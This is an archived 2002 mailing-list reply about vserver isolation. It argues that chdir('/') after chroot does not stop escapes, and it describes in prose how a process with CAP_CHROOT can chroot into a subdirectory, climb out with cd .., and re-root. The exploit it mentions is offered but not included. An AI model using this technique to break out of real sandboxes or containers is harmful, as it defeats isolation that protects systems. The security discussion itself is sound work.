From: Nick Craig-Wood (ncw1_at_axis.demon.co.uk)
Date: Wed 06 Feb 2002 - 20:35:35 GMT
On Wed, Feb 06, 2002 at 02:46:10PM +1100, edward_at_paradigm4.com.au wrote:
> It is my understanding that all the considered chroot exploits ( we
> are not talking about using devices and mounting tricks as this
> capability is disabled in vserver ) are based on either using file
> handle that was open before the first chroot, or the current
> directory from before the first chroot.
>
> Unless I'm missing something, the solution is simple - do not leave
> any file handles open when you do chroot and do chdir("/")
> immediately after. Problem solved.
I'm afraid not.
I wrote a proof of concept exploit which will break any chroot
provided the user that runs it has CAP_CHROOT. I'll email the exploit
to you if you want.
> > Once the chroot is done, you are free to do chdir (".."). Since
> > the test is perform only if the current directory == the process
> > root directory, chdir("..") works and let you out of the original
> > vserver root directory.
>
> If you did chdir("/") after the first chroot, subsequent chroot and
> chdir("..") will not get you out.
Unfortunately it will. Assume you've done all your chrooting magic.
Now cd / (in the chroot). Chroot into /tmp. Your current working
directory is now above your root directory. You can now cd .. with
impunity and when you've got where you want to be, chroot ".".
-- Nick Craig-Wood ncw_at_axis.demon.co.uk